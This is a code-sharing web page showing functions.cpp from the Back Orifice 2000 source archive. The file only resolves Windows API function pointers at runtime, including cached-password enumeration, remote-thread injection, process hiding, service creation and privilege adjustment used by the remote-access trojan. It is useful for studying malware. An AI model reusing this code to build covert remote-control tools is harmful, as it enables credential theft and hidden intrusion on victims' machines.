开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > Internet/网络编程 > 远程控制编程 > 查看源码
functions.cpp
资源名称:bo2ksrc.zip [点击查看]
上传用户:jinandeyu
上传日期:2007-01-05
资源大小:620k
文件大小:9k
源码类别:

远程控制编程

开发平台:

WINDOWS

functions.cpp:源码内容
  1. /*  Back Orifice 2000 - Remote Administration Suite
  2.     Copyright (C) 1999, Cult Of The Dead Cow
  4.     This program is free software; you can redistribute it and/or modify
  5.     it under the terms of the GNU General Public License as published by
  6.     the Free Software Foundation; either version 2 of the License, or
  7.     (at your option) any later version.
  9.     This program is distributed in the hope that it will be useful,
  10.     but WITHOUT ANY WARRANTY; without even the implied warranty of
  11.     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  12.     GNU General Public License for more details.
  14.     You should have received a copy of the GNU General Public License
  15.     along with this program; if not, write to the Free Software
  16.     Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  18. The author of this program may be contacted at dildog@l0pht.com. */
  20. #include<windows.h>
  21. #include<windef.h>
  22. #include<lmcons.h>
  23. #include<lmshare.h>
  24. #include<tlhelp32.h>
  25. #include<functions.h>
  26. #include<osversion.h>
  28. HINSTANCE ghDll_NetApi32;
  29. HINSTANCE ghDll_SvrApi;
  30. HINSTANCE ghDll_Mpr;
  31. HINSTANCE ghDll_Kernel32;
  32. HINSTANCE ghDll_AdvApi32;
  34. CREATESNAPSHOT pCreateToolhelp32Snapshot; 
  35. MODULEWALK  pModule32First; 
  36. MODULEWALK  pModule32Next; 
  37. PROCESSWALK pProcess32First; 
  38. PROCESSWALK pProcess32Next; 
  39. THREADWALK  pThread32First; 
  40. THREADWALK  pThread32Next; 
  41. REGSERVICEPROC pRegisterServiceProcess;
  42. CREATEREMOTETHREAD pCreateRemoteThread;
  43. VIRTUALALLOCEX pVirtualAllocEx;
  44. VIRTUALFREEEX pVirtualFreeEx;
  45. VIRTUALQUERYEX pVirtualQueryEx;
  46. VIRTUALPROTECTEX pVirtualProtectEx;
  48. ENUMPASSWORD pWNetEnumCachedPasswords;
  49. WNETCLOSEENUM pWNetCloseEnum;
  50. WNETENUMRESOURCE pWNetEnumResource;
  51. WNETOPENENUM pWNetOpenEnum;
  52. WNETCANCELCONNECTION2 pWNetCancelConnection2;
  53. WNETADDCONNECTION2 pWNetAddConnection2;
  55. LMS_NETSESSIONENUM pLMSNetSessionEnum;
  56. LMS_NETSHAREENUM pLMSNetShareEnum;
  57. LMS_NETSHAREDEL pLMSNetShareDel;
  58. LMS_NETSHAREADD pLMSNetShareAdd;
  59. LMS_NETAPIBUFFERFREE pLMSNetApiBufferFree;
  61. SVR_NETSESSIONENUM pSVRNetSessionEnum;
  62. SVR_NETSHAREENUM pSVRNetShareEnum;
  63. SVR_NETSHAREDEL pSVRNetShareDel;
  64. SVR_NETSHAREADD pSVRNetShareAdd;
  66. REGSETKEYSECURITY pRegSetKeySecurity;
  67. SETSECURITYDESCRIPTORDACL pSetSecurityDescriptorDacl;
  68. GETACE pGetAce;
  69. ADDACCESSALLOWEDACE pAddAccessAllowedAce;
  70. INITIALIZEACL pInitializeAcl;
  71. INITIALIZESECURITYDESCRIPTOR pInitializeSecurityDescriptor;
  72. GETLENGTHSID pGetLengthSid;
  73. LOOKUPACCOUNTNAME pLookupAccountName;
  74. LOOKUPACCOUNTSID pLookupAccountSid;
  75. GETSECURITYDESCRIPTORDACL pGetSecurityDescriptorDacl;
  76. GETSECURITYDESCRIPTORGROUP pGetSecurityDescriptorGroup;
  77. GETSECURITYDESCRIPTOROWNER pGetSecurityDescriptorOwner;
  78. OPENPROCESSTOKEN pOpenProcessToken;
  79. LOOKUPPRIVILEGEVALUE pLookupPrivilegeValue;
  80. ADJUSTTOKENPRIVILEGES pAdjustTokenPrivileges;
  81. REGGETKEYSECURITY pRegGetKeySecurity;
  83. OPENSCMANAGER pOpenSCManager;
  84. CREATESERVICE pCreateService;
  85. CLOSESERVICEHANDLE pCloseServiceHandle;
  86. OPENSERVICE pOpenService;
  87. STARTSERVICECTRLDISPATCHER pStartServiceCtrlDispatcher;
  88. REGISTERSERVICECTRLHANDLER pRegisterServiceCtrlHandler;
  89. SETSERVICESTATUS pSetServiceStatus;
  90. DELETESERVICE pDeleteService;
  91. GETSERVICEDISPLAYNAME pGetServiceDisplayName;
  92. STARTSERVICE pStartService;
  94. int InitDynamicLibraries(void)
  95. {
  97. if(g_bIsWinNT) {
  98. ghDll_NetApi32 = LoadLibrary("NETAPI32.DLL");
  99. if(ghDll_NetApi32==NULL) return -1;
  100. pLMSNetSessionEnum = (LMS_NETSESSIONENUM)GetProcAddress(ghDll_NetApi32, "NetSessionEnum");
  101. pLMSNetShareEnum = (LMS_NETSHAREENUM)GetProcAddress(ghDll_NetApi32, "NetShareEnum");
  102. pLMSNetShareDel = (LMS_NETSHAREDEL)GetProcAddress(ghDll_NetApi32, "NetShareDel");
  103. pLMSNetShareAdd = (LMS_NETSHAREADD)GetProcAddress(ghDll_NetApi32, "NetShareAdd");
  104. pLMSNetApiBufferFree = (LMS_NETAPIBUFFERFREE) GetProcAddress(ghDll_NetApi32, "NetApiBufferFree");
  105. } else {
  106. ghDll_SvrApi = LoadLibrary("SVRAPI.DLL"); 
  107. if(ghDll_SvrApi==NULL) return -1;
  108. pSVRNetSessionEnum = (SVR_NETSESSIONENUM)GetProcAddress(ghDll_SvrApi, "NetSessionEnum");
  109. pSVRNetShareEnum = (SVR_NETSHAREENUM)GetProcAddress(ghDll_SvrApi, "NetShareEnum");
  110. pSVRNetShareDel = (SVR_NETSHAREDEL)GetProcAddress(ghDll_SvrApi, "NetShareDel");
  111. pSVRNetShareAdd = (SVR_NETSHAREADD)GetProcAddress(ghDll_SvrApi, "NetShareAdd");
  112. }
  114. ghDll_Mpr=LoadLibrary("MPR.DLL");
  115. if(ghDll_Mpr==NULL) return -1;
  117. if(!g_bIsWinNT) {
  118. pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(ghDll_Mpr, "WNetEnumCachedPasswords");
  119. }
  121. pWNetCloseEnum = (WNETCLOSEENUM)GetProcAddress(ghDll_Mpr, "WNetCloseEnum");
  122. pWNetEnumResource = (WNETENUMRESOURCE)GetProcAddress(ghDll_Mpr, "WNetEnumResourceA");
  123. pWNetOpenEnum = (WNETOPENENUM)GetProcAddress(ghDll_Mpr, "WNetOpenEnumA");
  124. pWNetCancelConnection2 = (WNETCANCELCONNECTION2)GetProcAddress(ghDll_Mpr, "WNetCancelConnection2A");
  125. pWNetAddConnection2 = (WNETADDCONNECTION2)GetProcAddress(ghDll_Mpr, "WNetAddConnection2A");
  127. ghDll_Kernel32=LoadLibrary("KERNEL32.DLL");
  128. if(ghDll_Kernel32==NULL) return -1;
  129.     
  130. if(!g_bIsWinNT) {
  131. pCreateToolhelp32Snapshot = (CREATESNAPSHOT)GetProcAddress(ghDll_Kernel32,
  132. "CreateToolhelp32Snapshot"); 
  134.         pModule32First  = (MODULEWALK)GetProcAddress(ghDll_Kernel32, 
  135.             "Module32First"); 
  136.         pModule32Next   = (MODULEWALK)GetProcAddress(ghDll_Kernel32,
  137.             "Module32Next"); 
  139.         pProcess32First = (PROCESSWALK)GetProcAddress(ghDll_Kernel32, 
  140.             "Process32First"); 
  141.         pProcess32Next  = (PROCESSWALK)GetProcAddress(ghDll_Kernel32, 
  142.             "Process32Next"); 
  144.         pThread32First  = (THREADWALK)GetProcAddress(ghDll_Kernel32, 
  145.             "Thread32First"); 
  146.         pThread32Next   = (THREADWALK)GetProcAddress(ghDll_Kernel32, 
  147.             "Thread32Next"); 
  149. pRegisterServiceProcess = (REGSERVICEPROC)GetProcAddress(ghDll_Kernel32,
  150. "RegisterServiceProcess");
  152. } else {
  153. pCreateRemoteThread=(CREATEREMOTETHREAD) GetProcAddress(ghDll_Kernel32,
  154. "CreateRemoteThread");
  155.         pVirtualProtectEx = (VIRTUALPROTECTEX)GetProcAddress(ghDll_Kernel32, 
  156.             "VirtualProtectEx"); 
  157.         pVirtualAllocEx = (VIRTUALALLOCEX)GetProcAddress(ghDll_Kernel32, 
  158.             "VirtualAllocEx"); 
  159.         pVirtualQueryEx   = (VIRTUALQUERYEX)GetProcAddress(ghDll_Kernel32, 
  160.             "VirtualQueryEx"); 
  161.         pVirtualFreeEx   = (VIRTUALFREEEX)GetProcAddress(ghDll_Kernel32, 
  162.             "VirtualFreeEx"); 
  163. }
  165. ghDll_AdvApi32=LoadLibrary("ADVAPI32.DLL");
  166. if(ghDll_AdvApi32==NULL) return -1;
  167.     
  168. if(g_bIsWinNT) {
  169. pRegSetKeySecurity = (REGSETKEYSECURITY)GetProcAddress(ghDll_AdvApi32,
  170. "RegSetKeySecurity");
  171. pSetSecurityDescriptorDacl = (SETSECURITYDESCRIPTORDACL)GetProcAddress(ghDll_AdvApi32,
  172. "SetSecurityDescriptorDacl");
  173. pGetAce = (GETACE)GetProcAddress(ghDll_AdvApi32,
  174. "GetAce");
  175. pAddAccessAllowedAce = (ADDACCESSALLOWEDACE)GetProcAddress(ghDll_AdvApi32,
  176. "AddAccessAllowedAce");
  177. pInitializeAcl = (INITIALIZEACL)GetProcAddress(ghDll_AdvApi32,
  178. "InitializeAcl");
  179. pInitializeSecurityDescriptor = (INITIALIZESECURITYDESCRIPTOR)GetProcAddress(ghDll_AdvApi32,
  180. "InitializeSecurityDescriptor");
  181. pGetLengthSid = (GETLENGTHSID)GetProcAddress(ghDll_AdvApi32,
  182. "GetLengthSid");
  183. pLookupAccountName = (LOOKUPACCOUNTNAME)GetProcAddress(ghDll_AdvApi32,
  184. "LookupAccountNameA");
  185. pLookupAccountSid = (LOOKUPACCOUNTSID)GetProcAddress(ghDll_AdvApi32,
  186. "LookupAccountSidA");
  187. pGetSecurityDescriptorDacl = (GETSECURITYDESCRIPTORDACL)GetProcAddress(ghDll_AdvApi32,
  188. "GetSecurityDescriptorDacl");
  189. pGetSecurityDescriptorGroup = (GETSECURITYDESCRIPTORGROUP)GetProcAddress(ghDll_AdvApi32,
  190. "GetSecurityDescriptorGroup");
  191. pGetSecurityDescriptorOwner = (GETSECURITYDESCRIPTOROWNER)GetProcAddress(ghDll_AdvApi32,
  192. "GetSecurityDescriptorOwner");
  193. pOpenProcessToken = (OPENPROCESSTOKEN)GetProcAddress(ghDll_AdvApi32,
  194. "OpenProcessToken");
  195. pLookupPrivilegeValue = (LOOKUPPRIVILEGEVALUE)GetProcAddress(ghDll_AdvApi32,
  196. "LookupPrivilegeValueA");
  197. pAdjustTokenPrivileges = (ADJUSTTOKENPRIVILEGES)GetProcAddress(ghDll_AdvApi32,
  198. "AdjustTokenPrivileges");
  199. pRegGetKeySecurity = (REGGETKEYSECURITY)GetProcAddress(ghDll_AdvApi32,
  200. "RegGetKeySecurity");
  202. pOpenSCManager=(OPENSCMANAGER) GetProcAddress(ghDll_AdvApi32,
  203. "OpenSCManagerA");
  204. pCreateService=(CREATESERVICE) GetProcAddress(ghDll_AdvApi32,
  205. "CreateServiceA");
  206. pCloseServiceHandle=(CLOSESERVICEHANDLE) GetProcAddress(ghDll_AdvApi32,
  207. "CloseServiceHandle");
  208. pOpenService=(OPENSERVICE) GetProcAddress(ghDll_AdvApi32,
  209. "OpenServiceA");
  210. pStartServiceCtrlDispatcher=(STARTSERVICECTRLDISPATCHER) GetProcAddress(ghDll_AdvApi32,
  211. "StartServiceCtrlDispatcherA");
  212. pRegisterServiceCtrlHandler=(REGISTERSERVICECTRLHANDLER) GetProcAddress(ghDll_AdvApi32,
  213. "RegisterServiceCtrlHandlerA");
  214. pSetServiceStatus=(SETSERVICESTATUS) GetProcAddress(ghDll_AdvApi32,
  215. "SetServiceStatus");
  216. pDeleteService=(DELETESERVICE) GetProcAddress(ghDll_AdvApi32,
  217. "DeleteService");
  218. pGetServiceDisplayName=(GETSERVICEDISPLAYNAME) GetProcAddress(ghDll_AdvApi32,
  219. "GetServiceDisplayNameA");
  220. pStartService=(STARTSERVICE) GetProcAddress(ghDll_AdvApi32,
  221. "StartServiceA");
  222. }
  225. return 0;
  226. }
  229. int KillDynamicLibraries(void)
  230. {
  231. if(ghDll_AdvApi32!=NULL) 
  232. FreeLibrary(ghDll_AdvApi32);
  233. if(ghDll_Kernel32!=NULL) 
  234. FreeLibrary(ghDll_Kernel32);
  235. if(ghDll_Mpr!=NULL) 
  236. FreeLibrary(ghDll_Mpr);
  237. if(ghDll_NetApi32!=NULL) 
  238. FreeLibrary(ghDll_NetApi32);
  239. if(ghDll_SvrApi!=NULL) 
  240. FreeLibrary(ghDll_SvrApi);
  242. return 0;
  243. }